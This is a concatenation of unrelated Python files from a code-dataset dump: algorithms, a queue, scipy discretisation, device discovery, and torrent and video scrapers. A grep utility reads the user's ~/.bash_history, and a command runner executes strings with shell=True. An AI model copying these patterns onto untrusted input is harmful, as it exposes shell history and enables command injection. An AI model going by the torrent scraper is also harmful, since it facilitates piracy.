sleep(2)\n","sub_path":"test_environments/terra_producer.py","file_name":"terra_producer.py","file_ext":"py","file_size_in_byte":2318,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"24"} +{"seq_id":"401297530","text":"import click\nimport shlex\nimport subprocess\nfrom pathlib import Path\n\n@click.command()\n@click.option('--input', '-i', default='ls -a',\n help=\"Type stdin linux shell command,\\n\"\n \"A command with multiple parameters should be in quotation marks, example: 'ls -a'\")\n@click.option('--grep', '-g', default='.',\n help=\"Type any key word you wonna find,\\n\"\n \"A multiple strig should be in quotation marks example: 'find me'\")\ndef cli(input, grep):\n if input == 'history':\n home = str(Path.home())\n with open(home + '/.bash_history', 'r') as file:\n output = file.read()\n print_match_lines(output, grep)\n else:\n try:\n input = shlex.split(input)\n output = subprocess.check_output(input).decode('ascii')\n print_match_lines(output, grep)\n except:\n # This will check for any exception and then execute this print statement\n print(\"Error: Could not find file or read data\")\n\ndef print_match_lines(pss_output, pss_grep):\n pss_output = iter(pss_output.splitlines())\n for i in pss_output:\n if greps(i, pss_grep) != None:\n print(greps(i, pss_grep))\n\ndef greps(word, find):\n for x in range(len(word) - len(find) + 1):\n if find[0] == word[x]:\n for i in range(len(find)):\n if find[i] != word[x + i]:\n break\n else:\n if i + 1 == len(find):\n # word = word.replace(word[x + i - len(find) + 1:x + i + 1], word[x + i - len(find) + 1:x + i + 1].upper())\n red = lambda text: '\\033[0;31m' + text + '\\033[0m'\n word = word.replace(word[x + i - len(find) + 1:x + i + 1], red(word[x + i - len(find) + 1:x + i + 1]))\n return word\n","sub_path":"home-assignments/grep_click/grep_click.py","file_name":"grep_click.py","file_ext":"py","file_size_in_byte":1976,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"24"} +{"seq_id":"372153296","text":"import MapReduce\nimport json\nimport sys\n\nmr = MapReduce.MapReduce()\n\n# Map function\n# mr - MapReduce object\n# data - json object formatted as a string\ndef mapper(dataArr):\n\t#data = json.loads(datajson, encoding='latin-1') #in case data is whole document\n\t\n\t#for docid in data: #when data is dict type\n\t\t#words = data[docid] #when value is already an array\n\t\t#words = data[docid].split()\n\t\n\t\n\t#for item in dataArr: #when data is list of [docid, text]\n\t\t#docid = item[0]\n\t\t#words = item[1].split()\n\t\n\tdocid = dataArr[0]\n\twords = dataArr[1].split()\n\n\t# output (key, value) pair (only for mapper)\n\tfor key in words: \n\t\tmr.emit_intermediate(key, docid)\n\n\t\t\n# Reduce function\n# mr - MapReduce object\n# key - key generated from map phse, associated to list_of_values\n# list_of_values - values generated from map phase, associated to key\ndef reducer(key, list_of_values):\n\n # output item (only for reducer)\n mr.emit([key, list_of_values])\n\ndef main():\n # Assumes first argument is a file of json objects formatted as strings, \n #one per line.\n mr.execute(open(sys.argv[1]), mapper, reducer)\n\nif __name__ == '__main__':\n main()\n","sub_path":"howe/assignment3/inverted_index.py","file_name":"inverted_index.py","file_ext":"py","file_size_in_byte":1133,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"24"} +{"seq_id":"392265610","text":"def multiplicativeInverse(a,b):\n\tu,s = 1,0\n\twhile(b>0):\n\t\tq,a,b = int((a-a%b)/b),b,a%b\n\t\tu,s = s,int(u-(q*s))\n\treturn u\n\ndef add(x1,x2,y1,y2,p):\n\tinv = multiplicativeInverse((x2-x1),p)\n\ts = ((y2-y1)*inv)%p\n\tx3 = ((s*s)-x1-x2)%p\n\ty3 = (s*(x1-x3)-y1)%p\n\treturn x3,y3\n\ndef double(x,y,a,p):\n\tinv = multiplicativeInverse((2*y),p)\n\ts = ((3*x*x + a)*inv)%p\n\tx3 = ((s*s)-2*x)%p\n\ty3 = (s*(x-x3)-y)%p\n\treturn x3,y3\n\ndef multiply(d,x,y,a,p):\n\txr,yr = x,y\n\tbinExp=bin(d)[3:]\n\tfor i in binExp:\n\t\txr,yr = double(xr,yr,a,p)\n\t\tif(i==\"1\"):\n\t\t\txr,yr = add(x,xr,y,yr,p)\n\treturn xr,yr\n\ndef STR(a):\n\tresult = \"\"\n\ta = str(a)\n\tfor i in range(0,len(a)-1,2):\n\t\tresult += chr(int(a[i:i+2]))\n\tprint(result)\nd = 87441340171043308346177\na = 0\nn = 928669833265826932708591\nx = 236857987845294655469221\ny = 12418605208975891779391\nxr,yr = multiply(d,x,y,a,n)\nprint(STR(xr))\nprint(STR(yr))","sub_path":"02_ciphers/04_ellipticCurve/Python/ecc.py","file_name":"ecc.py","file_ext":"py","file_size_in_byte":857,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"24"} +{"seq_id":"481429323","text":"# 给定一个链表,判断链表中是否有环。 \n# \n# 为了表示给定链表中的环,我们使用整数 pos 来表示链表尾连接到链表中的位置(索引从 0 开始)。 如果 pos 是 -1,则在该链表中没有环。 \n# \n# \n# \n# 示例 1: \n# \n# 输入:head = [3,2,0,-4], pos = 1\n# 输出:true\n# 解释:链表中有一个环,其尾部连接到第二个节点。\n# \n# \n# \n# \n# 示例 2: \n# \n# 输入:head = [1,2], pos = 0\n# 输出:true\n# 解释:链表中有一个环,其尾部连接到第一个节点。\n# \n# \n# \n# \n# 示例 3: \n# \n# 输入:head = [1], pos = -1\n# 输出:false\n# 解释:链表中没有环。\n# \n# \n# \n# \n# \n# \n# 进阶: \n# \n# 你能用 O(1)(即,常量)内存解决此问题吗? \n# Related Topics 链表 双指针 \n# 👍 702 👎 0\n\n\n# leetcode submit region begin(Prohibit modification and deletion)\n# Definition for singly-linked list.\n# class ListNode:\n# def __init__(self, x):\n# self.val = x\n# self.next = None\n\nclass Solution:\n def hasCycleHash(self, head: ListNode) -> bool:\n \"\"\"\n 哈希法\n 时间复杂度O(n) 空间复杂度O(n)\n Hash表中存的是引用,而非具体数值. 相同head.val也有可能是不同节点\n \"\"\"\n tmp = []\n while head:\n if head in tmp:\n return True\n tmp.append(head)\n head = head.next\n return False\n\n def hasCycle(self, head: ListNode) -> bool:\n \"\"\"\n 快慢指针法 快2慢1 以慢指针为坐标系:慢指针原地不动,快指针每次追1步\n 时间复杂度O(n) 空间复杂度O(1)\n \"\"\"\n i, j = head, head\n while i and j and i.next:\n i = i.next.next\n j = j.next\n if i == j:\n return True\n return False\n\n# leetcode submit region end(Prohibit modification and deletion)\n","sub_path":"Week_01/day3_[141]环形链表.py","file_name":"day3_[141]环形链表.py","file_ext":"py","file_size_in_byte":1936,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"24"} +{"seq_id":"127304782","text":"\"\"\"\nContinuous to discrete transformations for state-space and transfer function.\n\"\"\"\nfrom __future__ import division, print_function, absolute_import\n\n# Author: Jeffrey Armstrong \n# March 29, 2011\n\nimport numpy as np\nfrom scipy import linalg\n\nfrom .ltisys import tf2ss, ss2tf, zpk2ss, ss2zpk\n\n__all__ = ['cont2discrete']\n\n\ndef cont2discrete(sys, dt, method=\"zoh\", alpha=None):\n \"\"\"\n Transform a continuous to a discrete state-space system.\n\n Parameters\n ----------\n sys : a tuple describing the system.\n The following gives the number of elements in the tuple and\n the interpretation:\n\n * 2: (num, den)\n * 3: (zeros, poles, gain)\n * 4: (A, B, C, D)\n\n dt : float\n The discretization time step.\n method : {\"gbt\", \"bilinear\", \"euler\", \"backward_diff\", \"zoh\"}\n Which method to use:\n\n * gbt: generalized bilinear transformation\n * bilinear: Tustin's approximation (\"gbt\" with alpha=0.5)\n * euler: Euler (or forward differencing) method (\"gbt\" with alpha=0)\n * backward_diff: Backwards differencing (\"gbt\" with alpha=1.0)\n * zoh: zero-order hold (default)\n\n alpha : float within [0, 1]\n The generalized bilinear transformation weighting parameter, which\n should only be specified with method=\"gbt\", and is ignored otherwise\n\n Returns\n -------\n sysd : tuple containing the discrete system\n Based on the input type, the output will be of the form\n\n * (num, den, dt) for transfer function input\n * (zeros, poles, gain, dt) for zeros-poles-gain input\n * (A, B, C, D, dt) for state-space system input\n\n Notes\n -----\n By default, the routine uses a Zero-Order Hold (zoh) method to perform\n the transformation. Alternatively, a generalized bilinear transformation\n may be used, which includes the common Tustin's bilinear approximation,\n an Euler's method technique, or a backwards differencing technique.\n\n The Zero-Order Hold (zoh) method is based on [1]_, the generalized bilinear\n approximation is based on [2]_ and [3]_.\n\n References\n ----------\n .. [1] http://en.wikipedia.org/wiki/Discretization#Discretization_of_linear_state_space_models\n\n .. [2] http://techteach.no/publications/discretetime_signals_systems/discrete.pdf\n\n .. [3] G. Zhang, X. Chen, and T. Chen, Digital redesign via the generalized\n bilinear transformation, Int. J. Control, vol. 82, no. 4, pp. 741-754,\n 2009.\n (http://www.ece.ualberta.ca/~gfzhang/research/ZCC07_preprint.pdf)\n\n \"\"\"\n if len(sys) == 2:\n sysd = cont2discrete(tf2ss(sys[0], sys[1]), dt, method=method,\n alpha=alpha)\n return ss2tf(sysd[0], sysd[1], sysd[2], sysd[3]) + (dt,)\n elif len(sys) == 3:\n sysd = cont2discrete(zpk2ss(sys[0], sys[1], sys[2]), dt, method=method,\n alpha=alpha)\n return ss2zpk(sysd[0], sysd[1], sysd[2], sysd[3]) + (dt,)\n elif len(sys) == 4:\n a, b, c, d = sys\n else:\n raise ValueError(\"First argument must either be a tuple of 2 (tf), \"\n \"3 (zpk), or 4 (ss) arrays.\")\n\n if method == 'gbt':\n if alpha is None:\n raise ValueError(\"Alpha parameter must be specified for the \"\n \"generalized bilinear transform (gbt) method\")\n elif alpha < 0 or alpha > 1:\n raise ValueError(\"Alpha parameter must be within the interval \"\n \"[0,1] for the gbt method\")\n\n if method == 'gbt':\n # This parameter is used repeatedly - compute once here\n ima = np.eye(a.shape[0]) - alpha*dt*a\n ad = linalg.solve(ima, np.eye(a.shape[0]) + (1.0-alpha)*dt*a)\n bd = linalg.solve(ima, dt*b)\n\n # Similarly solve for the output equation matrices\n cd = linalg.solve(ima.transpose(), c.transpose())\n cd = cd.transpose()\n dd = d + alpha*np.dot(c, bd)\n\n elif method == 'bilinear' or method == 'tustin':\n return cont2discrete(sys, dt, method=\"gbt\", alpha=0.5)\n\n elif method == 'euler' or method == 'forward_diff':\n return cont2discrete(sys, dt, method=\"gbt\", alpha=0.0)\n\n elif method == 'backward_diff':\n return cont2discrete(sys, dt, method=\"gbt\", alpha=1.0)\n\n elif method == 'zoh':\n # Build an exponential matrix\n em_upper = np.hstack((a, b))\n\n # Need to stack zeros under the a and b matrices\n em_lower = np.hstack((np.zeros((b.shape[1], a.shape[0])),\n np.zeros((b.shape[1], b.shape[1]))))\n\n em = np.vstack((em_upper, em_lower))\n ms = linalg.expm(dt * em)\n\n # Dispose of the lower rows\n ms = ms[:a.shape[0], :]\n\n ad = ms[:, 0:a.shape[1]]\n bd = ms[:, a.shape[1]:]\n\n cd = c\n dd = d\n\n else:\n raise ValueError(\"Unknown transformation method '%s'\" % method)\n\n return ad, bd, cd, dd, dt\n","sub_path":"env/lib/python2.7/site-packages/scipy/signal/cont2discrete.py","file_name":"cont2discrete.py","file_ext":"py","file_size_in_byte":5013,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"24"} +{"seq_id":"56414644","text":"class Empty(Exception):\n \"\"\" Error attempting to access element from empty container.\n Note that Empty is a subclass of python's builtin Exception class\"\"\"\n pass\n\nclass ArrayQueue:\n DEFAULT_CAPACITY = 10\n \"\"\" This class implements queue using Python list as an Adapter Pattern.\n\n Methods to implement for realizing Stack.\n i) enqueue(e)\n ii) dequeue()\n\n Accessor methods.\n i) first ~ return top element\n ii) is_empty ~ returns True if the stack is empty.\n iii) len ~ returns length of the Stack.\n\n \"\"\"\n\n def __init__(self):\n self._data = [None] * ArrayQueue.DEFAULT_CAPACITY\n self._size = 0 # Number of elements in the queue\n self._front = 0 # index of the first element that is to be removed\n\n def __len__(self):\n return self._size\n\n def is_empty(self):\n return self._size == 0\n\n def first(self):\n if self.is_empty():\n raise Empty('Queue is empty')\n \n return self._data[self._front]\n\n def dequeue(self):\n if self.is_empty():\n raise Empty('Queue is empty')\n\n answer = self._data[self._front]\n self._data[self._front] = None # help garbage collection\n self._size -= 1\n self._front = (self._front + 1) % len(self._data)\n\n return answer\n \n def enqueue(self, e):\n if self._size == len(self._data):\n self._resize( 2*len(self._data))\n\n index = (self._front + self._size) % len(self._data)\n self._data[index] = e\n self._size += 1\n\n def _resize(self, new_capacity):\n B = [None] * new_capacity\n for idx in range(self._size):\n B[idx] = self._data[self._front]\n self._front = (self._front + 1) % len(self._data)\n\n self._data = B\n self._front = 0\n\n \n \nif __name__ == '__main__':\n Q = ArrayQueue()\n Q.enqueue(1)\n Q.enqueue(2)\n Q.enqueue(3)\n Q.enqueue(4)\n Q.enqueue(5)\n Q.enqueue(6)\n Q.enqueue(7)\n Q.enqueue(8)\n Q.enqueue(9)\n Q.enqueue(10)\n print(Q.dequeue( ))\n Q.enqueue(11)\n Q.enqueue(12)\n Q.enqueue(13)\n Q.enqueue(14)\n Q.enqueue(15)\n print(Q.dequeue( ))\n print(Q.dequeue( ))\n Q.enqueue(7)\n Q.enqueue(9)\n print(Q._data)\n print(Q.first())\n Q.enqueue(4)\n print(len(Q))\n print(Q.dequeue( ))\n","sub_path":"Chapter#06/Queue.py","file_name":"Queue.py","file_ext":"py","file_size_in_byte":2371,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"24"} +{"seq_id":"628195632","text":"#!/usr/bin/env python\n# -*- coding: utf-8 -*-\n#\n# date: 2018/2/14\n# author: he.zhiming\n#\n\nfrom __future__ import unicode_literals, absolute_import\n\nimport subprocess\n\nfrom py3utils._exceptions import CommandRunFailedException\n\nfrom py3utils._unicode import UnicodeUtils\n\n\nclass CommandRunner:\n def __init__(self):\n \"\"\"\n\n Usage:\n CommandRunner().run(some_cmd_str)\n\n :return:\n \"\"\"\n self._cmd_str = None\n\n self._p = None\n self._stdout = None\n self._stderr = None\n\n def run(self, cmd_str: str, *, use_pipe=True):\n \"\"\"运行命令\n\n 不返回 stdout 的内容给调用方\n\n :param cmd_str:\n :return:\n \"\"\"\n self._cmd_str = cmd_str\n\n if use_pipe:\n self._p = subprocess.Popen(self._cmd_str, shell=True, stdout=subprocess.PIPE, stderr=subprocess.PIPE)\n else:\n self._p = subprocess.Popen(self._cmd_str, shell=True)\n\n (self._stdout, self._stderr) = self._p.communicate()\n\n if self._p.returncode != 0:\n raise CommandRunFailedException('run command failed(%s). reason: %s' % (\n self._cmd_str, UnicodeUtils.get_str(self._stderr)))\n else:\n return UnicodeUtils.get_str(self._stdout)\n","sub_path":"py3utils/_command.py","file_name":"_command.py","file_ext":"py","file_size_in_byte":1288,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"24"} +{"seq_id":"605313973","text":"#! usr/bin/env python3\n\n\"\"\"\n Module 2 Task 1\n barcode.py\n\"\"\"\n\nfrom __future__ import print_function\n\ndef printBarCode(zipCode):\n \"\"\"\n This function will convert the zip code to bar code format.\n 1. Incodes zipcode to bar format\n 2. Validates user input if it is match the format of US zip code.\n 3. Parses the numbers.\n 4. Calculates the check digit for the barcode\n 5. Invoke printDigit function to print out the zip code numbers and check digit as bar code format.\n Args:\n zipCode: string of zipcode to be validated and parsed.\n Returns:\n 0 if zip code is valid.\n 1 if zip code is not valid.\n \"\"\"\n\n # Declares and instantiate sa vertical bar variable and its value.\n pipe = \"|\"\n # sum variable will add up all the zip code digits.\n sum = 0\n # Check if the zip code is only numbers.\n if not zipCode.isdigit():\n print(\"Error: Zip code is not all numeric\")\n return 1\n # Check if the zip code is not less or not bigger than five digits.\n elif len(zipCode) != 5:\n print(\"Error: Zip code is not 5 digits\")\n return 1\n # Loop over each element in the zip code and parse numbers\n for el in zipCode:\n pipe += printDigit(int(el))\n sum += int(el)\n # Check if the total divided by 10 is greater than 0.\n if sum%10 > 0:\n # If so, make checkDigit equals 10 minus the remaining of the sum divided by 10\n checkDigit = 10 - (sum%10)\n else:\n # If not, make checkDigit equals 0\n checkDigit = 0\n # Call printDigit to print it out.\n pipe += printDigit(checkDigit)\n pipe += \"|\"\n print(pipe)\n return 0\n\n\ndef printDigit(d):\n \"\"\"\n This function will converts digits into barcode format and returns the result.\n Args:\n d: zip code passed in from printBarCode function to be reformatted\n Returns:\n barcode: The string representing the barcode of the digit.\n \"\"\"\n # Declares and initializes the barcode variable.\n barcode = \"\"\n # Add the full bar or the half bar to its location.\n position = 0\n # Check if the digit equals 0\n if d == 0:\n d = 11\n # Check if the digit is greater than or equals 7\n if d >= 7:\n # Draw full bar\n barcode += \"|\"\n d -= 7\n position += 1\n else:\n # Draw half bar\n barcode += \":\"\n # Check if the digit is greater than or equals 4\n if d >= 4:\n # Draw full bar\n barcode += \"|\"\n d -= 4\n position += 1\n else:\n # Draw half bar\n barcode += \":\"\n # Check if the digit is greater than or equals 2\n if d >= 2:\n # Draw full bar\n barcode += \"|\"\n d -= 2\n position += 1\n else:\n # Draw half bar\n barcode += \":\"\n # Check if the digit is greater than or equals 1\n if d >= 1:\n # Draw full bar\n barcode += \"|\"\n d -= 1\n position += 1\n else:\n # Draw half bar\n barcode += \":\"\n # Check if the digit equals 1\n if position == 1:\n # Draw full bar\n barcode += \"|\"\n else:\n # Draw half bar\n barcode += \":\"\n\n # Return barcode\n return barcode\n\n\ndef main():\n \"\"\"\n Run the python app.\n 1. Prompt the user to enter a zipcode.\n 2. Invoke printBarCode function.\n 3. Pass the user input to the printBarCode function.\n \"\"\"\n #Ask the user for a zip code.\n zipCode = input(\"Enter a zipcode: \")\n # Invoke printBarCode function and makes user input as an argument.\n printBarCode(zipCode)\n\n\nif __name__ == \"__main__\":\n main()\n exit(0)\n","sub_path":"barcode.py","file_name":"barcode.py","file_ext":"py","file_size_in_byte":3607,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"24"} +{"seq_id":"525263516","text":"\"\"\"Mobile Alerts device discovery.\"\"\"\nimport socket\nfrom datetime import timedelta\nimport logging\nimport struct\n\n\nDISCOVERY_PORT = 8003\nDISCOVERY_ADDRESS = ''\nDISCOVERY_PAYLOAD = b\"\\x00\\x01\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x0a\"\nDISCOVERY_TIMEOUT = timedelta(seconds=2)\n\n\nclass MobileAlerts:\n \"\"\"Base class to discover Mobile Alerts gateways.\"\"\"\n\n def __init__(self):\n \"\"\"Initialize the Mobile Alerts discovery.\"\"\"\n self.entries = [] # type: List[Tuple[str]]\n\n def scan(self):\n \"\"\"Scan the network.\"\"\"\n self.update()\n\n def all(self):\n \"\"\"Scan and return all found entries.\"\"\"\n self.scan()\n return self.entries\n\n def update(self):\n \"\"\"Scan network for Mobile Alerts gateways.\"\"\"\n entries = []\n\n sock = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)\n sock.setsockopt(socket.SOL_SOCKET, socket.SO_BROADCAST, 1)\n sock.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1)\n sock.settimeout(DISCOVERY_TIMEOUT.seconds)\n sock.sendto(DISCOVERY_PAYLOAD, (DISCOVERY_ADDRESS, DISCOVERY_PORT))\n\n while True:\n try:\n data, (address, _) = sock.recvfrom(1024)\n if len(data) != 0xba:\n continue\n type,gatewayID0,gatewayID1,gatewayID2,gatewayID3,gatewayID4,gatewayID5,length = struct.unpack('>H6BH', data[:2+6+2])\n if type != 3 or length != 0xba:\n continue\n deviceName = str(data[28:48], 'utf-8').rstrip('\\x00')\n entry = [('%02x'*6) % (gatewayID0,gatewayID1,gatewayID2,gatewayID3,gatewayID4,gatewayID5),deviceName]\n entry.insert(0, address)\n entries.append(tuple(entry))\n\n except socket.timeout:\n break\n except UnicodeDecodeError:\n # Catch invalid responses\n logging.getLogger(__name__).debug(\n 'Ignoring invalid unicode response from %s', address)\n continue\n\n self.entries = entries\n\n sock.close()\n\n\ndef main():\n \"\"\"Test Mobile Alerts discovery.\"\"\"\n from pprint import pprint\n mobilealerts = MobileAlerts()\n pprint(\"Scanning for Mobile Alerts gateways..\")\n mobilealerts.update()\n pprint(mobilealerts.entries)\n\n\nif __name__ == \"__main__\":\n main()\n","sub_path":"netdisco/mobilealerts.py","file_name":"mobilealerts.py","file_ext":"py","file_size_in_byte":2364,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"24"} +{"seq_id":"573358169","text":"import numpy as np\nfrom scipy import polyval, polyfit\nfrom matplotlib import pyplot as plt\n#from operator import mul\nfrom fastar import *\n\n# Assume a 2nd degree polynomial with coefficients a, b, c: y(x) = ax^2 + bx + c\na, b, c = polyfit(givenTemp, givenMAC, 2)\ny_val_lineMAC = polyval([a, b, c], givenTemp) # predicted values of y\nx_val_lineTemp = np.linspace(20.0, 80.0, 20)\ny_val_lineMAC = polyval([a, b, c], x_val_lineTemp)\n\n# Here we add the temperature values we want to find MAC for \nnewTemp = [25.0,35.0,45.0,55.0,65.0,75.0,80.0]\nnewMAC = polyval([a, b, c], newTemp)\nallTemps = sorted(givenTemp+newTemp)\nallMACS= sorted((givenMAC+newMAC.tolist()),reverse=True) \n\nwriteFile = open('TempvsMAC.txt','w')\naRow = \"T [°C]\\tMAC [m^2/mol]\\n\"\nfor k in range(len(allTemps)):\n\twriteFile.write(aRow)\n\taRow = \"%.1f\\t%.1f\\n\" % (allTemps[k], allMACS[k])\n\nwriteFile.write(aRow)\t\nwriteFile.close()\n\n# Create plots\nfig = plt.figure()\nax1 = fig.add_subplot(111)\nax1.plot(x_val_lineTemp, y_val_lineMAC, 'b-',givenTemp,givenMAC,'ro',newTemp,newMAC,'ko')\nplt.xlabel(r'$T$ [K]', fontsize=18)\nplt.ylabel(r'$\\varepsilon$ [m$^2/$mol] ', fontsize=16)\nplt.legend([\"Best fit line\",\"Referenced values\",\"Extrapolated values\"])\nplt.grid(True)\nplt.show()\n","sub_path":"Enthalpy of Iodine sublimation/src/extrapolate.py","file_name":"extrapolate.py","file_ext":"py","file_size_in_byte":1234,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"24"} +{"seq_id":"647636236","text":"from time import strftime\nfrom time import sleep\nfrom urllib.request import urlopen\n\ndef openUrlAndLog(site):\n response = urlopen(site)\n curTime = strftime(\"%Y-%m-%d %H:%M:%S\")\n print(str(curTime)+': '+str(response.status)+' '+response.geturl())\n\ndef hitSites(sites):\n for site in sites:\n if site[0] != '#':\n openUrlAndLog(site)\n \ndef runDaemon(sites):\n while 1:\n hitSites(sites)\n sleep(3540) #number of seconds in 59 minutes\n\nhitlist = open('hitlist.txt')\nsites = ['http://' + site.strip() for site in hitlist]\nhitlist.close()\nrunDaemon(sites)\n","sub_path":"KeepAlive.py","file_name":"KeepAlive.py","file_ext":"py","file_size_in_byte":595,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"24"} +{"seq_id":"147069922","text":"from flask import Flask,request\r\n\r\napp = Flask(__name__)\r\n\r\n@app.route('/api',methods=['GET'])\r\n\r\ndef index():\r\n Query = str(request.args['Query'])\r\n word=Query+\" \"\r\n lst = []\r\n st=\"\"\r\n for let in word:\r\n if(let==\" \"):\r\n lst.append(st)\r\n st=\"\"\r\n else:\r\n st = st + let\r\n print(lst)\r\n return Query\r\n\r\nif __name__ == '__main__':\r\n app.run()","sub_path":"API.py","file_name":"API.py","file_ext":"py","file_size_in_byte":408,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"24"} +{"seq_id":"180042422","text":"#!/usr/bin/env python\n\n__all__ = ['xtube_download', 'xtube_download_by_id']\n\nfrom ..common import *\n\nimport urllib\n\ndef xtube_download_by_id(id, title = None, output_dir = '.', merge = True, info_only = False):\n html = get_html('http://www.xtube.com/find_video.php?video_id=%s' % id)\n url = urllib.parse.unquote(r1('&filename=([a-zA-Z0-9\\-\\%\\.\\\\_]+)', html))\n title = \"[%s] %s\" % (id, title)\n type, ext, size = url_info(url)\n print_info(site_info, title, type, size)\n if not info_only:\n download_urls([url], title, ext, size, output_dir, merge = merge)\n\ndef xtube_download(url, output_dir = '.', merge = True, info_only = False):\n html = get_html(url)\n title = r1(r'(.*)', html)\n assert title\n id = r1(r'http://www.xtube.com/watch.php\\?v=([a-zA-Z0-9\\-]+)', url)\n assert id\n xtube_download_by_id(id, title, output_dir = output_dir, merge = merge, info_only = info_only)\n \nsite_info = \"xtube.com\"\ndownload = xtube_download\ndownload_playlist = playlist_not_supported('xtube')\n","sub_path":"src/you_get/downloader/xtube.py","file_name":"xtube.py","file_ext":"py","file_size_in_byte":1034,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"24"} +{"seq_id":"486885193","text":"from bs4 import BeautifulSoup\nimport requests\nimport os\nfrom download import Download\nimport sys\n\nclass Tdownloader:\n def __init__(self, title):\n self.title = title.replace(' ', '+')\n self.pg = 1\n\n def get_title(self):\n return self.title\n\n def Contents(self, url):\n headers = {\n 'user-Agent': 'Mozilla/5.0'\n }\n with requests.get(url, headers=headers) as data:\n contents = BeautifulSoup(data.content, \"html.parser\")\n return contents\n\n def Informations(self, page=1):\n \"\"\"\n Get information from https://1337x.to/\n \"\"\"\n numbers_list = []\n urls_list = []\n names_list = []\n seeds_list = []\n leeches_list = []\n sizes_list = []\n informations = []\n\n contents = self.Contents(f\"https://1337x.to/search/{self.title}/{page}/\")\n urls = contents.findAll(\"td\", \"name\")\n names = contents.findAll(\"td\", \"name\")\n seeds = contents.findAll(\"td\", \"seeds\")\n leeches = contents.findAll(\"td\", \"leeches\")\n sizes = contents.findAll(\"td\", \"size\")\n\n [numbers_list.append(count) for count in range(1, len(names))]\n [names_list.append(name.a.next_sibling.text.strip(' ⭐'))\n for name in names]\n [seeds_list.append(seed.text) for seed in seeds]\n [leeches_list.append(leech.text) for leech in leeches]\n [sizes_list.append(size(text=True, recursive=False)[0])\n for size in sizes]\n [urls_list.append(url.a.next_sibling[\"href\"]) for url in urls]\n\n [informations.append(info) for info in zip(\n numbers_list, names_list, seeds_list, leeches_list, sizes_list, urls_list)]\n\n return informations\n\n def ShowInfo(self, page=1):\n BOLD = '\\033[1m'\n CGREY = '\\33[90m'\n OKBLUE = '\\033[94m'\n WARNING = '\\033[93m'\n GREEN = '\\33[32m'\n RED = '\\033[91m'\n ENDC = '\\033[0m'\n\n print(f\"\\n{WARNING}NUMBER{ENDC}\\t\\t{BOLD}NAME{ENDC}\\t\\t{GREEN}SEEDS{ENDC}\\t\\t{RED}LEECHES{ENDC}\\t\\t{OKBLUE}SIZE{ENDC}\")\n print(f'{CGREY}={ENDC}' * 90)\n\n for i in self.Informations(page=page):\n print(\n f\"{WARNING}{i[0]}{ENDC} | {BOLD}{i[1]}{ENDC} |{GREEN}{i[2]}{ENDC} | {RED}{i[3]}{ENDC} |{OKBLUE}{i[4]}{ENDC}\",\n end='\\n{}{}{}\\n'.format(CGREY, '=' * 90, ENDC)\n )\n print(f\"{BOLD} PAGE {page} {ENDC}\\n\")\n\n def GetPath(self):\n path = os.path.abspath(__file__)\n base_dir = os.path.dirname(path)\n download_path = os.path.join(base_dir, 'downloads')\n os.makedirs(download_path, exist_ok=True)\n return download_path\n\n def next_page(self):\n os.system(\"clear\")\n self.pg += 1\n self.ShowInfo(self.pg)\n self.select_page()\n return self.pg\n\n def prev_page(self):\n os.system(\"clear\")\n self.pg -= 1\n self.ShowInfo(self.pg)\n self.select_page()\n return self.pg\n\n def select_page(self):\n ch = input(\"[?] 'next' for next page\\n[?] 'prev' for previous page\\n[?] 'ok' stay right page: \")\n \n if ch == str(\"next\"):\n mpage = self.next_page()\n elif ch == str(\"prev\"):\n if self.pg == 1:\n raise TypeError(\"this page is 1 .. not previous page exist !!!!!\")\n mpage = self.prev_page()\n elif ch == str(\"ok\"):\n mpage = self.pg\n else:\n raise TypeError(\"bad choice\")\n\n def Download_Torrent_File(self):\n choose = int(input(\"select number: \"))\n for i in self.Informations(page=self.pg):\n if choose == int(i[0]):\n os.system(\"clear\")\n print(f\"[+] {i[1]}\")\n print(f\"[+] getting magnet\")\n content = self.Contents(f'https://1337x.to{i[5]}')\n magnet_link = content.find(\"div\", \"no-top-radius\").a[\"href\"]\n Download(magnet_link)\n print(\"\\n\\t download started .. \\n\")\n\ndef main(): \n inp = str(input(\"search: \"))\n a = Tdownloader(inp)\n print(f\"you search for '{a.get_title()}'\\n\")\n a.ShowInfo()\n a.select_page()\n a.Download_Torrent_File()\n\nif __name__ == '__main__':\n main()\n while True:\n again = input(\"do you want to search again?(y or n): \")\n if again == str('y'):\n main()\n elif again == str('n'):\n sys.exit()\n else:\n raise TypeError(\"bad choice\")\n sys.exit()\n","sub_path":"qbitDownloader/Tdownloader.py","file_name":"Tdownloader.py","file_ext":"py","file_size_in_byte":4515,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"24"} +{"seq_id":"588475718","text":"\n\nfrom os.path import join\nimport numpy as np\nimport BrainDataAnalysis.neuroseeker_specific_functions as ns_funcs\nfrom ExperimentSpecificCode._2018_Chronic_Neuroseeker_TouchingLight._2019_06_25_AK_47p2 import constants as const\nfrom ExperimentSpecificCode._2018_Chronic_Neuroseeker_TouchingLight.Common_functions \\\n import events_sync_funcs as sync_funcs, firing_rates_sync_around_events_funcs as fr_funcs\nfrom BrainDataAnalysis.Spike_Sorting import positions_on_probe as spp\nfrom BrainDataAnalysis.Statistics import binning\nfrom BrainDataAnalysis.Statistics import binning, cluster_based_permutation_tests as cl_per\nfrom BrainDataAnalysis.Graphics import ploting_functions as plf\n\nfrom sklearn import preprocessing as preproc\nimport pandas as pd\nimport matplotlib.pyplot as plt\n\nimport common_data_transforms as cdt\nimport sequence_viewer as sv\nimport slider as sl\n\nfrom npeet.lnc import MI\n\n\n# 